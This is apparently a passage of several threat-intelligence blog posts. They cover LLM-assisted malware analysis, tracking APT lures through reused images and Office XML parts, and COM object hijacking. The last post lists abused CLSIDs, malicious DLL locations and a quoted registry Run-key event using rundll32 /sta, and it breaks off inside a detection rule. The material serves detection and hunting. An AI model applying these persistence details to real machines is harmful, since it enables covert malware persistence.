This idea, unfortunately, didn’t work as expected. There are many capabilities that are easy to detect dynamically in execution but difficult to identify statically and vice versa. Additionally, CAPA’s output is based on a series of rules (similar to YARA), which don’t necessarily work consistently for every single capability.
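The comparison we had in mind can be sketched as a simple set operation. The capability names below are illustrative placeholders, not real output from either source, and the function name is hypothetical.

```python
def compare_capabilities(llm: set, sandbox: set) -> dict:
    """Compare capability names reported by the LLM and by the sandbox."""
    both = llm & sandbox
    union = llm | sandbox
    return {
        "agreed": sorted(both),
        "llm_only": sorted(llm - sandbox),
        "sandbox_only": sorted(sandbox - llm),
        # Jaccard similarity: 1.0 means both sources report the same set.
        "jaccard": len(both) / len(union) if union else 1.0,
    }


# Illustrative capability names only.
llm_caps = {"encrypt data using RC4", "create process"}
sandbox_caps = {"create process", "write file"}
print(compare_capabilities(llm_caps, sandbox_caps))
```

The `llm_only` and `sandbox_only` buckets are where the static versus dynamic visibility gap described above shows up.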

Prompt evolution

This was one of the key points during our research. We’ve experimented with various prompt engineering techniques to improve the accuracy and comprehensiveness of LLM-generated analysis reports, increasingly adding additional context to the LLM. As we progressed in the investigation, we started providing dynamic execution details along with the decompiled code, providing way better results: at the end of the day, this allows us to combine both dynamic and static analysis.
Encouraged by the good results, we added more context from what we knew about the sample in VirusTotal: details on related IOCs, configuration extracted from the samples, etc. For example, if the analyzed sample drops another file during execution, we can provide the full VirusTotal report of said dropped file. This can help disambiguate situations where other security tools hesitate over whether the sample is a legitimate installer or drops malware, which is of great relevance. However, we also discovered that we need to be very cautious about the information we provide in the prompt, as it might bias the LLM’s analysis. For instance, it *seems* the LLM might give more weight to some details provided in the prompt, which could affect its analysis of the code.
We found that a good way to give the LLM all the details it needs without biasing its answer was Gemini’s function calling, which allows Gemini to dynamically request context data as needed using API calls to VirusTotal.
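The general shape of this mechanism can be sketched without any SDK. Everything below is an assumption made for illustration: the declaration format, the `call` dictionary, and the stubbed `get_file_report` handler are hypothetical and do not reproduce Gemini's actual client objects.

```python
import json

# Hypothetical tool declaration in the JSON-schema style used by function-calling APIs.
GET_FILE_REPORT = {
    "name": "get_file_report",
    "description": "Return the VirusTotal report for a file hash.",
    "parameters": {
        "type": "object",
        "properties": {"sha256": {"type": "string"}},
        "required": ["sha256"],
    },
}


def get_file_report(sha256: str) -> dict:
    # Placeholder: a real handler would query the VirusTotal API here.
    return {"sha256": sha256, "note": "stubbed report"}


HANDLERS = {"get_file_report": get_file_report}


def dispatch(call: dict) -> str:
    """Run the function the model asked for and return JSON to feed back to it."""
    handler = HANDLERS.get(call["name"])
    if handler is None:
        return json.dumps({"error": "unknown function " + call["name"]})
    return json.dumps(handler(**call.get("args", {})))


print(dispatch({"name": "get_file_report", "args": {"sha256": "placeholder"}}))
```

The point of the design is that context is only fetched when the model asks for it, instead of being pushed into the prompt up front.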

Conclusion

Our ongoing research into LLM-powered malware analysis has yielded promising results, demonstrating the potential of this technology to transform the way we detect and respond to threats. While challenges remain, we’re confident that continued advancements in LLMs, our understanding of their capabilities and our improvement in our analysis decision tree will lead to even more effective and efficient malware analysis solutions.
Importantly, we believe that LLM analysis is not intended to replace human reverse engineers, but rather to augment their capabilities. By automating routine tasks and providing valuable insights, LLMs can empower analysts to focus on more complex and critical aspects of malware analysis, ultimately enhancing our collective ability to combat cyber threats. In addition, LLM capabilities can be of great help to most security practitioners who lack the in-depth knowledge necessary for reverse engineering, or who don’t need a profound understanding of every single aspect of the malware analyzed.
We’re committed to sharing our findings with the security community and collaborating with researchers and practitioners to further advance the field of LLM-driven malware analysis. As we continue to explore the possibilities of this exciting technology, we’re optimistic about the future of AI-powered malware analysis.

Tracking Threat Actors Using Images and Artifacts

When tracking adversaries, we commonly focus on the malware they employ in the final stages of the kill chain and infrastructure, often overlooking samples used in the initial ones.
In this post, we will explore some ideas to track adversary activity leveraging images and artifacts mostly used during delivery. We presented this approach at the FIRST CTI in Berlin and at Botconf in Nice.

Hunting early

In threat hunting and detection engineering activities, analysts typically focus heavily on the latter stages of the kill chain – from execution to actions on objectives (Figure 1). This is mainly because there is more information available about adversaries in these phases, and it’s easier to search for clues using endpoint detection and response (EDR), security information and event management (SIEM), and other solutions.

Figure 1: Stages of the kill chain categorized by their emphasis on threat hunting and detection engineering.
We have been exploring ideas to improve our hunting for samples built in the weaponization phase and distributed in the delivery phase, focusing on the detection of suspicious Microsoft Office documents (Word, Excel, and PowerPoint), PDF files, and emails.
In threat intelligence platforms and cybersecurity in general, green and red colors are commonly used to quickly indicate results and identify whether or not something is malicious. This is because they are perceived as representing good or bad, respectively.
Multiple studies in psychology have demonstrated how colors can influence our decision-making process. VirusTotal, through the third-party engines integrated into it, shows users when something is detected and therefore deemed “malicious,” and when something is not detected and considered “benign.”
For example, the sample in Figure 2 belongs to a Microsoft Word document distributed by the SideWinder group during the year 2024.

Figure 2: Document used by the SideWinder APT group
The sample in question was identified at the time of writing this post by 31 antivirus engines, leaving no doubt that it is indeed a real malware sample. In the process of pivoting to identify new samples or related infrastructure, starting with Figure 2, the analyst will likely click on the URL detected by 11 out of the 91 engines, and the domains detected by 17 and 15 engines, respectively, to see if there are other samples communicating with them. The remaining two domains (related to windows.com and live.com) in this case are easily identified as legitimate domains that were likely contacted by the sandbox during its execution.

Figure 3: Relationships within the SideWinder APT group document
Further down in the VirusTotal report for the same sample (Figure 3), the analyst will likely click on the ZIP file listed as “compressed parent” to check if there are other samples within this ZIP besides the current one. They may also click on the XML file detected by 8 engines, and the LNK file detected by 4 engines. The remaining files in the bundled files section probably won’t be clicked, as the green color indicates they are not malicious, and also because they have less enticing formats, mainly XML and JPEG. But what if we explore them?

XML files generated by Microsoft Office

When you create a new Microsoft Office file, it automatically generates a series of embedded XML files containing information about the document. Additionally, if you use images in the document, they are also embedded within it. Microsoft Office files are compressed files (similar to ZIP files). In VirusTotal, when a Microsoft Word file is uploaded, you can see all these embedded files in the embedded files section.
We have mainly focused on three types of embedded files within Office documents:
  • Images:Many threat actors use images related to the organizations or entities they intend to impersonate. They do this to make documents appear legitimate and gain the trust of their victims.

  • [Content_Types].xml:This file specifies the content types and relationships within the Office Open XML (OOXML) document. It essentially defines the types of content and how they are organized within the file structure.

  • Styles.xml:Stores stylistic definitions for your document. These styles provide consistent formatting instructions for fonts, paragraph spacing, colors, numbering, lists, and much more.

Our hypothesis is: If malicious Microsoft Word documents are copied and pasted during the weaponization building process, with only the content being modified, the hashes of the [Content_Types].xml and styles.xml files will likely remain the same.
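A minimal way to test this hypothesis locally is to hash those two parts directly from the document archive. The sketch below assumes Word documents, where the styles part normally lives at `word/styles.xml`; the function name is hypothetical.

```python
import hashlib
import io
import zipfile

# Parts of interest inside a Word document (OOXML archive).
PARTS = ("[Content_Types].xml", "word/styles.xml")


def ooxml_part_hashes(data: bytes) -> dict:
    """Map each part of interest to its SHA-256, for parts present in the archive."""
    hashes = {}
    with zipfile.ZipFile(io.BytesIO(data)) as archive:
        names = set(archive.namelist())
        for part in PARTS:
            if part in names:
                hashes[part] = hashlib.sha256(archive.read(part)).hexdigest()
    return hashes
```

Two documents that were copied and only had their body text changed should return identical dictionaries, even though the hashes of the documents themselves differ.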

Office documents

To check our hypothesis, we selected a set of samples used during delivery and belonging to the threat actors listed in Figure 4:

Figure 4: Number of samples per actor within the scope
Let’s analyze some of the results we obtained per actor.

APT28 – Images

We started by focusing on images APT28 has reused for different delivery samples (Figure 5).

Figure 5: Images shared in multiple documents by APT28
Each line in the Figure 5 graph represents the same image, and each point represents at least two samples that used that particular image.
The second image of the graph shows how it was used by different Office documents at different points in time, from 2018 to 2022 (dates related to their upload to VirusTotal).
Now, the chart in Figure 6 visualizes each of these images.

Figure 6: Content of the images shared in multiple documents by APT28
  • The first image is just a simple line with no particular meaning. It’s embedded in over 100 files known by VirusTotal.

  • The second image is a hand and has 14 compressed parents.

  • The third image consists of black circles and also has over 100 compressed parents.

  • The last image is like a Word page with a table, presenting a fake EDA Roadmap of the European Commission. The image format is EMF (an old format) and it has 4 compressed parents.

If we delve into the compressed parents of the second image (the one with the hand), we can see how the image is used in Office documents that are part of a campaign reported by Mandiant attributed to APT28. The image of the hand was used in fake Word documents for hotel reservations, particularly in a small section where the client was supposed to sign.

Figure 7: Pivoting through a specific image used by APT28

SideWinder – Images

SideWinder (aka RAZOR TIGER) is a group focused on carrying out operations against military targets in Pakistan. This group has traditionally reused images, which might help monitor their activity.

Figure 8: Images shared in multiple documents by RAZOR TIGER
In particular, the image in Figure 9 was used in a sample uploaded in September 2021 and in a second one uploaded in March 2022. The image in question is the signature of Baber Bilal Haider.

Figure 9: Two different samples of RAZOR TIGER share the same image of a handwritten signature

Gamaredon – [Content_Types].xml and styles.xml

For Gamaredon we found they reused styles.xml and [Content_Types].xml in different documents, which helped reveal new samples.
The chart in Figure 10 displays all the [Content_Types].xml files from Gamaredon’s Office documents.

Figure 10: [Content_Types].xml shared in multiple documents by Gamaredon Group
There are a large number of samples that share the same [Content_Types].xml. It’s important to highlight that these [Content_Types].xml files are not necessarily exclusively used by Gamaredon, and can be found in other legitimate files created by users worldwide. However, some of these [Content_Types].xml might be interesting to monitor.
Styles.xml files are usually less generic, which should make them a better candidate to monitor:

Figure 11: Styles.xml shared in multiple documents by Gamaredon Group
We see styles.xml files are less reused than [Content_Types].xml. This could be because some of the samples used by this actor for distribution are created from scratch or reusing legitimate documents.
We used patterns identified in the styles.xml files to launch a retrohunt on VirusTotal. Figure 12 visually represents the original set of styles.xml files (left) and those that were added later after running the retrohunt (right).

Figure 12: Initial graph of the styles.xml and its parents used by Gamaredon (left). Final graph after identifying new styles.xml and their parents using retrohunt in VirusTotal (right)
One of the new styles.xml files found in our retrohunt has 17 compressed parents, meaning it was included in 17 Office files.

Figure 13: Number of parent documents for a specific styles.xml file used by Gamaredon
All the parents were malicious, some of them identical and the rest very similar to each other. The content of many of them referred to “Foreign institutions of Ukraine – Embassy of Ukraine in Hungary,” containing a table with phone numbers and information about the embassy, such as social media links and email accounts. Here’s an example:

Figure 14: Document used by Gamaredon in one of its campaigns that includes multiple images which can be used to monitor new samples
The information for social media includes the logos of these platforms, such as the Facebook logo, Skype logo, an image of a telephone, etc. By pivoting on the image of the Facebook icon, we find that it has 12 additional compressed parents, meaning it appears in 12 documents, all of them sharing the same styles.xml file.
Visualizing all together, we find a set of about 12-14 images used within the same timeframe by the actor. All of these images can be found in the “Embassy of Ukraine in Hungary” document.

Figure 15: Pivoting through the Facebook image that included the document in Figure 14
There’s a pattern evident in the previous image, where different images were included in files uploaded simultaneously. This pattern is associated with multiple documents used in the same Embassy of Ukraine in Hungary campaign, all of which used the social media images described above.

Styles.xml shared between threat actors

Another aspect we explored was if different threat actors shared similar styles.xml files in their documents. Styles.xml files are somewhat more specific and unique than [Content_Types].xml files because they can contain styles created by threat actors or by legitimate entities that originally created the document and then were modified by the actor. This makes them stand out more and can help in identifying threat actor activity.
This doesn’t necessarily imply they share information to conduct separate operations, although in some cases, it could be a scenario worth considering.

Figure 16: styles.xml shared between different threat actors
Of all styles.xml files related to actors in our initial set, only six of them were found to be shared by at least two actors. Some styles defined by the styles.xml file are very generic and could identify almost any type of file. However, there are others that could be interesting to explore further.
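Finding which artifact hashes are shared across actors is a matter of inverting an actor-to-hashes mapping. The sketch below uses placeholder hash values and a hypothetical function name.

```python
from collections import defaultdict


def shared_between_actors(actor_hashes: dict, minimum: int = 2) -> dict:
    """Return {hash: sorted actor names} for hashes seen in at least `minimum` actors."""
    owners = defaultdict(set)
    for actor, hashes in actor_hashes.items():
        for file_hash in hashes:
            owners[file_hash].add(actor)
    return {h: sorted(actors) for h, actors in owners.items() if len(actors) >= minimum}


# Placeholder hashes for illustration only.
data = {
    "APT28": {"aaa", "bbb"},
    "UAC-0099": {"aaa"},
    "Gamaredon": {"ccc"},
}
print(shared_between_actors(data))
```

The same helper works for [Content_Types].xml hashes or embedded image hashes.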
An interesting case is the styles.xml file with hash 13ed55637980452662cb6838a2931a5e54fbed5881bcbae368b3d189d3a01930, which seems to be shared by Razor Tiger, APT28, and UAC-0099. Specifically, the samples from APT28 and UAC-0099 stand out because they were uploaded to VirusTotal within short time frames, suggesting they might belong to the same threat actor.
You can see the list of hashes in the appendix of this blog.

[Content_Types].xml shared between threat actors

Like in the previous case, we checked if there were Office documents among different threat actors sharing [Content_Types].xml:

Figure 17: [Content_Types].xml shared between different threat actors
In this case, there are eleven [Content_Types].xml files that are shared by at least two different actors.
An interesting case here is the file dfa90f373b8fd8147ee3e4bfe1ee059e536cc1b068f7ec140c3fc0e6554f331a, which is shared by Gamaredon, APT37, Mustang Panda, APT28, SideCopy, and UAC-0099. Again, there could be different explanations for this.
Another interesting case that is worth analyzing in detail is [Content_Types].xml with hash 4ea40d34cfcaf69aa35b405c575c7b87e35c72246f04d2d0c5f381bc50fc8b3d, which is only shared by APT28 and APT29.
You can see the list of hashes in the appendix of this blog.

AI to the rescue

The images reused by attackers seem to be a promising idea we decided to further explore.
We used the VirusTotal API to download and unzip a set of Office documents used for delivery, which gave us all the embedded images. Then we used Gemini to automatically describe what these images were about.
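The unzip step can be sketched as below for a document that has already been downloaded. It assumes the usual OOXML layout where images sit in a `media` folder (for example `word/media/`); the extension list and function name are assumptions for illustration.

```python
import hashlib
import io
import zipfile
from pathlib import PurePosixPath

# Extensions treated as images here (an assumption; extend as needed).
IMAGE_EXTS = {".png", ".jpg", ".jpeg", ".gif", ".bmp", ".emf", ".wmf"}


def extract_images(data: bytes) -> dict:
    """Return {archive member name: (sha256, raw bytes)} for embedded images."""
    images = {}
    with zipfile.ZipFile(io.BytesIO(data)) as archive:
        for name in archive.namelist():
            path = PurePosixPath(name)
            if "media" in path.parts and path.suffix.lower() in IMAGE_EXTS:
                blob = archive.read(name)
                images[name] = (hashlib.sha256(blob).hexdigest(), blob)
    return images
```

The SHA-256 of each image can be used for pivoting, while the raw bytes can be handed to the model that describes the image.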

Figure 18: Results obtained with Gemini after processing some of the embedded images in the documents used by the threat actors
Figure 18 shows some examples of images that were incorporated by certain actors. There were also other results that were not helpful, mainly related to images that did not show a logo or anything specific that indicated what they were.

Figure 19: Results obtained with Gemini after processing some of the embedded images in the documents used by the threat actors
Using the VirusTotal API to obtain the documents you are looking for, and combining the results with Gemini to analyze their images automatically, can help analysts monitor potentially suspicious documents and build their own database of samples that use specific images, for example government or company images. This approach is interesting not only for threat hunting but also for brand monitoring.

PDF Documents

Images dropped by Acrobat Reader

Unlike Office documents, PDF files don’t contain embedded XML files or images, although some PDF files may be created from Office documents. Some of our sandboxes include Adobe Acrobat Reader to open PDF documents, which generates a thumbnail of the first page in BMP format. This image is stored in the directory C:\Users\<user>\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons. Consequently, our sandboxes provide this BMP image as a dropped file from the PDF, allowing us to pivot.
To illustrate this functionality, see Figure 20 attributed to Blind Eagle, a cybercrime actor associated with Latin America.

Figure 20: Content of a PDF file related to Blind Eagle threat actor
Figure 20 was provided by our sandbox. In the “relations” tab, we can see the BMP image as a dropped file:

Figure 21: BMP file generated by the sandbox that can be used for pivoting
The BMP file itself also shows relations, in particular up to 6 PDF files in the “execution parents” section. In other words, there are other PDFs that look exactly the same as the initial one.
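This kind of pivot can also be scripted against the VirusTotal API v3 relationship endpoints. The sketch below only builds the request URL and parses a response that is assumed to follow the usual `{"data": [{"id": ...}]}` shape; the helper names are hypothetical and no network call is made.

```python
from urllib.parse import quote

API_ROOT = "https://www.virustotal.com/api/v3"


def relationship_url(file_hash: str, relationship: str = "execution_parents") -> str:
    """Build the URL for a file relationship such as execution_parents."""
    return f"{API_ROOT}/files/{quote(file_hash)}/{quote(relationship)}"


def parent_hashes(response: dict) -> list:
    """Pull object IDs out of a relationship response ({'data': [{'id': ...}, ...]})."""
    return [item["id"] for item in response.get("data", [])]


# Illustrative response body with placeholder IDs.
sample = {"data": [{"id": "pdf-hash-1", "type": "file"}, {"id": "pdf-hash-2", "type": "file"}]}
print(relationship_url("bmp-hash-placeholder"))
print(parent_hashes(sample))
```

The actual request needs an API key sent in the `x-apikey` header. Other relationships mentioned in this post, such as compressed parents, can be requested by changing the `relationship` argument.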
Typically, many actors engaged in financial crime activities utilize widely spread PDF files to deceive their victims, making this approach highly valuable. Another interesting example we found involves phishing activities targeting a Russian bank called “Tinkoff Bank.”
The PDF files urge victims to accept an invitation from this bank to participate in a project.

Figure 22: The content of a PDF file used by cybercrime actors
Applying the same approach we identified 20 files with identical content, most of them classified as malicious by AV engines.

Figure 23: BMP file generated by the sandbox that can be used for pivoting, in this case having other 20 PDF with the same image
There are some limitations to this approach. For instance, the PDF file might be slightly modified (font size, some letter/word, color, …) which would generate a completely different hash value for the thumbnail we use to pivot.

Other artifacts dropped during sandbox detonation

Just like the BMP files generated by Acrobat Reader, there are other interesting files that might be dropped during sandbox detonation. These artifacts can be useful on some occasions.
The first example is a JavaScript file dropped in another PDF attributed to Blind Eagle.

Figure 24: BMP file generated by the sandbox that can be used for pivoting, another example of Blind Eagle threat actor
The dropped JavaScript file’s name during the PDF execution was “Chrome Cache Entry: 566”, indicating that this file was likely generated by opening a URL through Chrome, possibly triggered by a sandbox click on a link within the PDF. Examining the file’s contents, we observe some strings and variables in Spanish.

Figure 25: Artifact generated by the sandbox via Google Chrome when connecting to a domain
The strings “registerResourceDictionary”, “sampleCustomStringId”, and “rf_RefinementTitle_ManagedPropertyName” are related to Microsoft SharePoint, as we were able to confirm. These files were probably generated after visiting sites that have Microsoft SharePoint functionalities. We found that all the PDFs containing this artifact dropped by Google Chrome came from a website belonging to the Government of Colombia.

Figure 26: Flow of artifact generation related to Google Chrome that can be used for pivoting in VirusTotal

Email files

Many threat actors incorporate images in their emails, such as company logos, to deceive victims. We used this to identify several mailing campaigns where the same footer was used.

Campaign impersonating universities

On November 13, 2023, we shared details about a new campaign impersonating universities, primarily located in Latin America. By leveraging the presence of social network logos in the footer, we were able to find more universities in different continents targeted by the same attacker.

Figure 27: Email impersonating a university that contains multiple images
Figure 27 shows several images, including the University of Chile’s logo and building, as well as images related to social networks like YouTube, Facebook, and Twitter.
Pivoting through the images related to the University of Chile doesn’t yield good results, as it’s too specific. However, if we pivot through the images of the social media footer, represented as email attachments, we can observe multiple files using the same logo.

Figure 28: Using the images from the email footer to pivot and identify new emails
Just by analyzing one of the social media logos, we saw 33 email parents, all of them related to the same campaign.

Figure 29: Other emails identified through image pivoting techniques

Campaigns impersonating companies

Another common case is adding a company logo to the email signature to enhance credibility. Logos of delivery companies, banks, and suppliers were among the most frequently observed images during our research.
For example, this email utilizes the corporate image of China Anhui Technology Import and Export Co Ltd in the footer.

Figure 30: Email impersonating a Chinese organization using the company logo in the footer
Pivoting through the image we found 20 emails using the same logo.

Figure 31: Other emails identified through image pivoting techniques

Wrapping up

We can potentially trace malicious actors by examining artifacts linked to the initial spreading documents, and in the case of images, AI can help us automate potential victim identification and other hunting aspects.
In order to make this even easier, we are planning to incorporate a new bundled_files field into the IOCs JSON structure, which basically will help to create livehunt rules. In the meantime you can use vt_behaviour_files_dropped.sha256 for those scenarios where the files are dropped.
In certain situations, the styles.xml and [Content_Types].xml files within office documents can provide valuable clues for identifying and tracking the same threat actor. The method presented here offers an alternative to traditional hunting or pivoting techniques, serving as a valuable addition to a team’s hunting activities.
We hope you found this research interesting and useful, and as always we are happy to hear your feedback.
Happy hunting!

APPENDIX

[Content_Types].xml shared between threat actors

[Content_Types].xml sha256 | Shared by
3d8578fd41d766740a1f1ddef972a081436a2d70ab1e9552a861e58d8bbf5321 | APT33, APT32
4ea40d34cfcaf69aa35b405c575c7b87e35c72246f04d2d0c5f381bc50fc8b3d | APT29, APT28
4f7fa7433484b4e655d185719613e2f98d017590146d15eedc1aa1d967636b3a | FIN7, Gamaredon, APT28, APT32
529739886f6402a9cd5a8064ece73eef19c597ef35c0bc8d09390e8b4de9041b | FIN7, APT33, TA505, Mustang Panda
688dca40507fb96630f3df80442266a0354e7c24b7df86be3ea57069b25d12c6 | Gamaredon, APT33
6f1ac5f0ebfb7e97d3dc4100e88eaab10016a5cac75e1251781f2ea12477af51 | Gamaredon, Hazy Tiger, APT33
7796c382cd4c7c4ae3bcf2eed4091fbb20a2563ca88f2aecadb950ad9cf661f8 | Razor Tiger, APT28, UAC-0099
b4fa7f3faa0510e4d969219bceec2a90e8a48ff28e060db3cdd37ce935c3779c | Razor Tiger, SideCopy
dfa90f373b8fd8147ee3e4bfe1ee059e536cc1b068f7ec140c3fc0e6554f331a | Gamaredon, APT37, Mustang Panda, APT28, UAC-0099, SideCopy
fe98b3bcf96f9c396eb9193f0f9484ef01d3017257300cc76098854b1f103b69 | FIN7, Hazy Tiger
ff5a5ba3730a8d2ec0cbad39e5edf4ad502107bd0ef8a5347f29262b3dfe8a43 | Mustang Panda, APT32

styles.xml shared between threat actors

styles.xml sha256 | Shared by
13ed55637980452662cb6838a2931a5e54fbed5881bcbae368b3d189d3a01930 | APT28, UAC-0099, Razor Tiger
2de1fc9c48c4b0190361c49cdb053fd39cf81e32f12c82d08f88aec34358257f | Hazy Tiger, Gamaredon, APT33
59df7787c7cf5408481ae149660858d3af765a0c2cd63d6309b151380f92adb2 | TA505, Gamaredon
8f590f608f0719404a1731bb70a6ce2db420fd61e5a387d5b3091d47c7e21ac9 | APT28, FIN7, Razor Tiger, APT32, APT33
de392cd4bf1d650a9cf8c6d24e05e0605bf4eaf1518710f0307d8aceb9e5496c | Hazy Tiger, FIN7
e16f84c5fd1df6af1a1f2049f7862f4ea460765863476afb17e78edee772d35b | APT32, SideCopy, Mustang Panda, Razor Tiger

COM Objects Hijacking

The COM Hijacking technique is often utilized by threat actors and various malware families to achieve both persistence and privilege escalation in target systems. It relies on manipulating Component Object Model (COM), exploiting the core architecture of Windows that enables communication between software components, by adding a new value on a specific registry key related to the COM object itself.
We studied the usage of this technique by different malware samples to pinpoint the most exploited COM objects in 2023.

Abused COM Objects

We identified the most abused COM objects by samples using MITRE’s T1546.015 technique during sandbox execution. In addition to the most abused ones, we will also highlight other abused COM objects that we found interesting.
The chart below shows the distribution of how many samples abused different COM objects for persistence:

You can find the most used COM / CLSIDs listed in the Appendix.

Berbew

One of the main malware families we have observed abusing COM for persistence is Padodor/Berbew. This Trojan primarily focuses on stealing credentials and exfiltrating them to remote hosts controlled by attackers. The main COM objects abused by this family are as follows:
  • {79ECA078-17FF-726B-E811-213280E5C831}

  • {79FEACFF-FFCE-815E-A900-316290B5B738}

  • {79FAA099-1BAE-816E-D711-115290CEE717}

The corresponding registry entries point to the malicious DLL. However, multiple samples of this family use a second registry key for persistence, which points to the CLSID described above, as in the following example:

In this case, the registry key …CLSID\{79ECA078-17FF-726B-E811-213280E5C831}\InProcServer32\(Default) points to the malicious DLL C:\Windows\SysWow64\Iimgdcia.dll. A second registry entry …Wow6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\Web Event Logger points to the previous CLSID {79ECA078-17FF-726B-E811-213280E5C831} which loads the malicious DLL.
The ShellServiceObjectDelayLoad registry key, combined with the Web Event Logger entry used here by Berbew, has frequently been used to load the genuine webcheck.dll. This DLL was tasked with monitoring websites within the Internet Explorer application.
The CLSID previously used by the WebCheck registry key was {E6FB5E20-DE35-11CF-9C87-00AA005127ED}. However, in certain instances today the CLSID {08165EA0-E946-11CF-9C87-00AA005127ED} is used. Both are responsible for loading webcheck.dll and are abused by malware samples.

RATs

The CLSID {89565275-A714-4a43-912E-978B935EDCCC} seems to be extensively used by various RATs. This CLSID has primarily been associated with families like RemcosRAT and AsyncRAT in our observations. However, we’ve also encountered instances where BitRAT samples have used it. Researchers at Cisco Talos found this CLSID activity associated with the SugarGh0st RAT malware.
In the majority of cases, the DLL used for persistence with this CLSID is dynwrapx.dll. This DLL was found in the wild in a GitHub repository that is currently unavailable; it originates from a project named DynamicWrapperX (first seen in VirusTotal in 2010). It executes shellcode to inject the RAT into a process.
A similar case is CLSID {26037A0E-7CBD-4FFF-9C63-56F2D0770214}. The associated DLL for persistence is dbggame.dll. First uploaded to VirusTotal in 2012, this DLL is deployed by various types of malware, including ransomware such as XiaoBa.

RATs w/ vulnerabilities

To finish with RATs that use this technique, from late December 2023 to February 2024, there were various incidents linked to the CVE-2024-21412 vulnerability uncovered by the Trend Micro Zero Day Initiative team (ZDI). During these events, active campaigns were distributing the DarkMe RAT. Throughout the infection process, a primary goal was to evade Microsoft Defender SmartScreen and introduce victims to the DarkMe malware.
The Trend Micro analysis highlights that the DarkMe RAT sample utilizes the CLSID {74A94F46-4FC5-4426-857B-FCE9D9286279} to carry out the final load of the RAT. Yet, we’ve noted the utilization of other CLSIDs for persistence, including {D4D4D7B7-1774-4FE5-ABA8-4CC0B99452B4} in this sample.
Furthermore, to guarantee the DLL’s execution, they generate a registry key employing Autorun keys. This key’s objective is to initiate the CLSID using rundll32.exe and /sta parameter, which is used to load a COM object, in this case, the previous malicious COM object created.
EventID:13 
EventType:SetValue
Details:%windir%\SysWOW64\rundll32.exe /sta {D4D4D7B7-1774-4FE5-ABA8-4CC0B99452B4} "USB_Module"
TargetObject:HKU\S-1-5-21-575823232-3065301323-1442773979-1000\Software\Microsoft\Windows\CurrentVersion\Run\RunDllModule
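An event like this one can be triaged with a few lines of code. The sketch below assumes the event is available as plain `Key:value` lines, as shown above; the function names are hypothetical.

```python
import re

CLSID_RE = re.compile(r"\{[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}")

EVENT = r"""EventID:13
EventType:SetValue
Details:%windir%\SysWOW64\rundll32.exe /sta {D4D4D7B7-1774-4FE5-ABA8-4CC0B99452B4} "USB_Module"
TargetObject:HKU\S-1-5-21-575823232-3065301323-1442773979-1000\Software\Microsoft\Windows\CurrentVersion\Run\RunDllModule"""


def parse_event(text: str) -> dict:
    """Split 'Key:value' lines on the first colon."""
    fields = {}
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        if sep:
            fields[key.strip()] = value.strip()
    return fields


def sta_clsid(fields: dict):
    """Return the CLSID passed to rundll32 /sta in a Run-key value, else None."""
    details = fields.get("Details", "").lower()
    target = fields.get("TargetObject", "").lower()
    if "rundll32" not in details or "/sta" not in details:
        return None
    if "\\currentversion\\run\\" not in target:
        return None
    match = CLSID_RE.search(fields["Details"])
    return match.group(0) if match else None


print(sta_clsid(parse_event(EVENT)))
```

The extracted CLSID can then be checked against the InProcServer32 entries set by the same sample.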

Why use one when you can use many?

Some samples (like this Sality one) use multiple CLSIDs:
  • {EBEB87A6-E151-4054-AB45-A6E094C5334B}

  • {57477331-126E-4FC8-B430-1C6143484AA9}

  • {241D7F03-9232-4024-8373-149860BE27C0}

  • {C07DB6A3-34FC-4084-BE2E-76BB9203B049}

The sample drops two different DLLs during execution: three of the registry keys point to one of them, and the remaining one points to the other. The sample also turns off the Windows firewall and UAC to carry out additional actions while infecting the system.

The Allaple worm family deploys multiple COM objects pointing to the malicious DLL during execution, like in this example:

Adware

Citrio, an adware web browser designed by Catalina Group, uses a COM object with CLSID {F4CBF20B-F634-4095-B64A-2EBCDD9E560E} for persistence in its more recent versions. It drops several harmful DLLs. One of them masquerades as Google Update (goopdate.dll), has also been observed as psuser.dll, and can establish services on the system in addition to using a COM object for persistence.

Common folders used to store the payloads

Most malicious DLLs we have seen so far are stored in the C:\Users\<user>\AppData\Roaming\ directory. It’s also common to create subfolders within this directory; the most frequently found include:
  • \qmacro

  • \mymacro

  • \MacroCommerce

  • \Plugin

  • \Microsoft

In addition to these, we also found the following folders being frequently used to hide malicious DLLs:
  • C:\Windows\SysWow64 is a folder found in 64-bit versions of Windows that contains legitimate 32-bit system files and libraries, and it is often used to conceal malicious DLLs. Its prevalence makes it an attractive hiding place, complicating detection efforts. However, permissions are required to create files in it.

  • C:\Program Files (x86) is another legitimate directory used to store malicious COM hijacking payloads. As with \AppData\Roaming, we have observed that the malicious DLLs are stored under specific subfolders, such as “\Google”, “\Mozilla Firefox”, “\Microsoft”, “\Common Files” or “\Internet Download Manager”.

  • C:\Users\<user>\AppData\Local is another folder used for storing these payloads, including the “\Temp”, “\Microsoft” and “\Google” subfolders.
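As a rough illustration of how the folders above could support triage, the following Python sketch flags DLL paths located under them. The function names and the way the user name is normalized are assumptions made for this example; only the folder list comes from this section.

```python
import re

# Parent folders taken from this section; "<user>" stands for any account name.
COMMON_PARENT_FOLDERS = [
    r"C:\Users\<user>\AppData\Roaming",
    r"C:\Users\<user>\AppData\Local",
    r"C:\Windows\SysWow64",
    r"C:\Program Files (x86)",
]


def _normalize(path: str) -> str:
    """Replace the account name with the <user> placeholder and lowercase the path."""
    return re.sub(r"(?i)^(c:\\users\\)[^\\]+", r"\1<user>", path).lower()


def is_common_hijack_path(dll_path: str) -> bool:
    """Return True if dll_path sits under one of the folders listed above."""
    candidate = _normalize(dll_path)
    return any(
        candidate.startswith(folder.lower() + "\\")
        for folder in COMMON_PARENT_FOLDERS
    )
```

A hit only means the location is commonly abused. Legitimate software also lives in these folders, so the check is best combined with other signals such as detections or the CLSID being registered.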

Detection

In order to detect unusual modifications to registry COM objects, there are a couple of crowdsourced Sigma rules to identify this behavior.

These rules will detect uncommon registry modifications related to COM objects. You can use the following queries to retrieve samples triggered by the previous rules, respectively: VTI query for sigma1 and VTI query for sigma2.
You can also identify this behavior using Livehunt rules that target the creation of registry keys utilized for this purpose, for instance with the vt.behaviour.registry_keys_set modifier.
import "vt"

rule CLSID_COM_Hijacking {
  meta:
    target_entity = "file"
    hash = "a19472bd5dd89a6bd725c94c89469f12cdbfee3b0f19035a07374a005b57b5e0"
    author = "@Joseliyo_Jstnk"
    mitre_technique = "T1546.015"
    mitre_tactic = "TA0003"

  condition:
    vt.metadata.new_file and vt.metadata.analysis_stats.malicious >= 5 and 
